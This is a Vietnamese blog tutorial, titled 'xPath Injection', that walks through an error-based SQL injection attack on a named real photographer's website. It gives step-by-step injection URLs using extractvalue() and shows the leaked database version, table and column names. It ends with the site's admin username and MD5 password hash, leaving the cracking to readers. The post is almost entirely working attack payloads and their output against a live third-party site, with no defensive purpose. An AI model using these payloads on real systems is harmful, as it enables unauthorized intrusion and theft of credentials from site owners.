Thứ Ba, 14 tháng 5, 2013

TUT xPath Injection


http://www.ianforsythphotographer.com/main.php?id=1'
Lỗi
Query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1
Dùng đoạn lệnh này lấy ver
and extractvalue(rand(),concat(0x0a,version()))--+
link :

http://www.ianforsythphotographer.com/main.php?id=1' and extractvalue(rand(),concat(0x0a,version()))--+

Có thông tin : "Query failed: XPATH syntax error: ' 5.1.39-log'" ==> ver > 5

get tablename bằng đoạn code sau:
and extractvalue(rand(),concat(0x0a,(select concat(0x3a,table_name) from information_schema.tables WHERE table_schema=database() limit 0,1)))--+
Link Dạng


http://www.ianforsythphotographer.com/main.php?id=1' and extractvalue(rand(),concat(0x0a,(select concat(0x3a,table_name) from information_schema.tables WHERE table_schema=0x69665f696d61676573 limit 3,1)))--+
Ta có: "Query failed: XPATH syntax error: ':logger_config'"
tablename: plogger_config
ta khai thác tiếp bằng code sau:
and extractvalue(rand(),concat(0x0a,(select concat(0x3a,column_name) from information_schema.columns WHERE table_name="TABLE NAME" limit 0,1)))
trong đó table name ta thay bằng plogger_config mà ta đã check đc lúc nãy và ta có link:
http://www.ianforsythphotographer.com/main.php?id=1' and extractvalue(rand(),concat(0x0a,(select concat(0x3a,column_name) from information_schema.columns WHERE table_name="plogger_config" limit 3,1)))--+
ta có:

"Query failed: XPATH syntax error: '::admin_username'"

http://www.ianforsythphotographer.com/main.php?id=1' and extractvalue(rand(),concat(0x0a,(select concat(0x3a,column_name) from information_schema.columns WHERE table_name="plogger_config" limit 4,1)))--+

"Query failed: XPATH syntax error: '::admin_password'"
và ta có đoạn lấy pass và username tổng hợp bằng code sau:

extractvalue(rand(),concat(0x0a,(select concat(COLUMNS) from TABLE)))--
Trong đó COLUMNS là hai cái column ta khai thác dc là
+ admin_username
+ admin_password
trong đó columns se có dạng select concat(admin_username,0x3a,admin_password) nhớ là có 0x3a

và TABLE là cái table ta khai thác dc lúc đầu thay vào link có dang:
http://www.ianforsythphotographer.com/main.php?id=1' and extractvalue(rand(),concat(0x0a,(select concat(admin_username,0x3a,admin_password) from if_images.plogger_config LIMIT 0,1)))--+
"Query failed: XPATH syntax error: 'admin:392592ed88f501ea498f14343'"
haha 392592ed88f501ea498f14343' ==> MD5 còn nữa là chuyện của anh em nhé

0 nhận xét:

Đăng nhận xét

Đăng ký: Đăng Nhận xét (Atom)